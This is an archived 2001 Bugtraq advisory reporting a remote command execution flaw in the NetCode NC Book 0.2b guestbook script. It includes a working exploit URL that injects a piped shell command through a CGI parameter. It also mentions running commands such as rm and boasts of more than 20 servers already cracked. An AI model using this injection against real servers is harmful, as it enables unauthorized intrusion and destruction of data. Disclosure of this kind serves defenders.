[22229] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

NetCode NC Book 0.2b remote command execution vulnerability

daemon@ATHENA.MIT.EDU (Hannibal Lector)
Mon Aug 13 15:41:58 2001

Date: 13 Aug 2001 19:14:38 -0000
Message-ID: <20010813191438.23554.qmail@securityfocus.com>
From: Hannibal Lector <digitalseed@poizonb0x.org>
To: bugtraq@securityfocus.com

* more than 20 servers were successfly cracked 
using this 'little' hole *

------[ PoizonB0x Advisory#6 pb0x-06-08-2001 ]---------

-NAME:
 NetCode NC Book 0.2b remote command execution 
vulnerability.

-DESCRIPTION: 
 NetCode's GuestBook. Find more info about it here:
http://netcode.lgg.ru/vault/ncbook/

-PROBLEM:
 A pretty big hole in the main script of that guestbook 
leads to command execution on the remote server 
running this vulnerable perl script.


-EXPLOIT: 
ex.: http://target/cgi-bin/ncbook/book.cgi?
action=default&current=|ls -
la/|&form_tid=996604045&prev=main.html&list_mess
age_index=10

!The above line if given will output the file contents of 
the kernel dir. Also you can execute any commands 
(ls, cat, rm etc)


-AUTHORs:
 Discovery: digitalseed and ksenor
 Advisory: digitalseed

-DISCLAIMER:
 PoizonB0x may not be held liable for the use or 
potential effects of these programs or advisories, nor 
the content contained within. Use them at your own 
risk.

-COPYRIGHT:
 PoizonB0x Crew - 
 www.poizonb0x.org (c) 2000-2001
  L...Future Security...l

------[ PoizonB0x Advisory#1 pb0x-06-08-2001 ]---------

home	help	back	first	fref	pref	prev	next	nref	lref	last	post